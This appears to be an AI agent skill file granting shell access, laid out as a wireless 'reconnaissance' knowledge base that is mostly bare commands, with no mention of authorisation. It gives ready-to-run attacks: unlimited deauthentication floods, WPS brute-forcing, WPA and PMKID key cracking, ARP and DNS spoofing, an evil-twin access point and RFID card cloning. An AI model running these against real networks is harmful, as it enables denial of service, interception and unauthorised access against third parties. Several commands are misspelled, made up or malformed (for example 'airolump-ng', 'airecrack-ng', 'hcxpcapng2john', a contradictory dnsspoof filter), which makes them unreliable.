| name | wireless-security |
| description | Wireless network security reconnaissance — WiFi analysis, Bluetooth assessment, RFID/NFC evaluation, signal capture, protocol analysis, encryption testing, rogue device detection. |
| allowed-tools | Bash Read Write |
| metadata | {"subdomain":"reconnaissance","when_to_use":"wireless security, WiFi analysis, Bluetooth assessment, RFID, NFC, signal capture, protocol analysis, encryption testing, rogue device detection, wardriving, packet capture","tags":"wireless, wifi, bluetooth, rfid, nfc, signal-analysis, encryption-testing, wardriving, packet-capture, rogue-device","mitre_attack":"T1584, T1584.001, T1584.002, T1584.003, T1584.004"} |
Wireless Network Security Reconnaissance Knowledge Base
Wireless network security reconnaissance involves identifying, analyzing, and assessing wireless communication protocols and networks for vulnerabilities. This includes WiFi, Bluetooth, RFID/NFC, Zigbee, Z-Wave, LoRaWAN, and other wireless technologies.
1. WiFi Network Reconnaissance
Network Discovery
airodump-ng wlan0
airodump-ng -c 6 --bssid <BSSID> wlan0
wash -i wlan0 -C
Target Identification
airolump-ng wlan0
airodump-ng -c <channel> --bssid <BSSID> -w capture wlan0
Client Identification
airodump-ng -c <channel> --bssid <BSSID> wlan0
aireplay-ng -0 10 -a <BSSID> -c <Client_MAC> wlan0
2. WiFi Encryption Analysis
Encryption Type Detection
airodump-ng -c <channel> wlan0 | grep "CH\s*"
if [ "$(airodump-ng -c <channel> wlan0 | grep WEP)" ]; then echo "WEP detected - vulnerable!"; fi
airodump-ng -c <channel> wlan0 | grep -E "WPA|WPA2"
airodump-ng -c <channel> wlan0 | grep "OPEN"
Vulnerability Assessment
wash -i wlan0 -C
reaver -i wlan0 -b <BSSID> -vv
bully <BSSID> -c <channel> wlan0
hcxpcapngtool -o hash.hc22000 capture.cap --pmkid
aireplay-ng -0 10 -a <BSSID> wlan0
Key Cracking
airecrack-ng -b <BSSID> capture.cap
airecrack-ng -w wordlist.txt -b <BSSID> capture.cap
hcxpcapng2john capture.hc22000 > hash.txt
hashcat -m 22000 hash.txt wordlist.txt
3. Bluetooth Reconnaissance
Device Discovery
hcitool scan
bluetoothctl scan on
bluetoothctl devices
Service Discovery
sdptools browse <device_address>
rfcomm -a <device_address> list
Connection Attempts
bluetoothctl connect <device_address>
bluetoothctl trust <device_address>
bluetoothctl pair <device_address>
4. BLE (Bluetooth Low Energy) Analysis
BLE Device Discovery
hcitool lescan
bluetoothctl scan on
BLE Service Discovery
gatttool -b <device_address> -p /dev/null connect
gatttool -b <device_address> -p /dev/null primary
gatttool -b <device_address> -p /dev/null characteristics
BLE Packet Capture
btmon
tshark -i bluetooth0 -f "btcommon.address == <device_address>"
5. RFID and NFC Reconnaissance
RFID Analysis
rfidtool --read
rfidtool --clone --source <source_uid> --target <target_uid>
proxmark3> hf search
proxmark3> hf mfdump
NFC Analysis
nfc-list
nfc-poll
mfoc -O mf_dump.bin
nfc-mfultralight rdump nfc_dump.bin
strings nfc_dump.bin
6. Signal Analysis and Capture
Packet Capture
tcpdump -i wlan0 -n -w capture.pcap
tcpdump -i wlan0 -n port 53 -w dns_capture.pcap
tshark -i wlan0 -w wireless_capture.pcap
Spectrum Analysis
rtl_sdr -f 2412e6 -s 2e6 -g 20 -b 8 -F 0 -l 0 -E deinterleave -E dcblock -E normalized output.raw
Signal Strength Analysis
watch -n 1 "iwconfig wlan0 | grep Signal"
kismet
7. Rogue Device Detection
Rogue Access Point Detection
kismet
wifi-pumpkin -i wlan0
airodump-ng -c <channel> wlan0 | grep -E "<known_SSID>|<known_BSSID>"
Rogue Client Detection
airodump-ng -c <channel> wlan0 | grep -v <authorized_mac_list>
airodump-ng -c <channel> wlan0 | grep -E "<known_MAC_prefixes>"
8. Wireless Protocol Analysis
WiFi Protocol Analysis
tshark -i wlan0 -Y "wlan.fc.type == 0" -V
tshark -i wlan0 -Y "wlan.fc.type == 1" -V
tshark -i wlan0 -Y "wlan.fc.type == 2" -V
Bluetooth Protocol Analysis
tshark -i bluetooth0 -V
tshark -i bluetooth0 -Y "btatt" -V
9. Encryption Testing
WiFi Encryption Testing
aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <My_MAC> wlan0
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -e <ESSID> -a <BSSID> -h <My_MAC> wlan0
aircrack-ng -w wordlist.txt -b <BSSID> capture.cap
Bluetooth Encryption Testing
bluetoothctl info <device_address>
10. Advanced Wireless Attacks
Deauthentication Attacks
aireplay-ng -0 10 -a <BSSID> -c <Client_MAC> wlan0
aireplay-ng -0 10 -a <BSSID> wlan0
aireplay-ng -0 0 -a <BSSID> wlan0
MITM Attacks
arpspoof -i wlan0 -t <target_ip> -r <gateway_ip>
dnsspoof -i wlan0 "tcp port 53 and (udp port 53)"
Evil Twin Attack
airbase-ng -e <Fake_SSID> -c <channel> wlan0
11. Wireless Security Tools
WiFi Tools
aircrack-ng suite
wifite
kismet
Bluetooth Tools
bluetoothctl
rfcomm
sdptools
RFID/NFC Tools
rfidtool
libnfc tools
proxmark3-client
Tools Summary
| Tool | Purpose | Required |
|---|
airodump-ng | WiFi packet capture | ✅ |
aireplay-ng | WiFi packet injection | ✅ |
aircrack-ng | WiFi encryption cracking | ✅ |
wash | WPS detection | ✅ |
reaver | WPS brute-force attack | ✅ |
bully | WPS brute-force attack | ✅ |
hcxpcapngtool | PMKID extraction | ✅ |
hashcat | Password cracking | ✅ |
hcitool | Bluetooth device scanning | ✅ |
bluetoothctl | Bluetooth device management | ✅ |
gatttool | BLE service discovery | ✅ |
rfcomm | RFCOMM channel access | ✅ |
sdptools | SDP service discovery | ✅ |
tcpdump | Network packet capture | ✅ |
tshark | Command-line protocol analysis | ✅ |
kismet | Wireless network detector | ✅ |
rtlsdr | Software Defined Radio | ❌ |
proxmark3 | RFID/NFC analysis | ❌ |
wifite | Automated WiFi attacks | ✅ |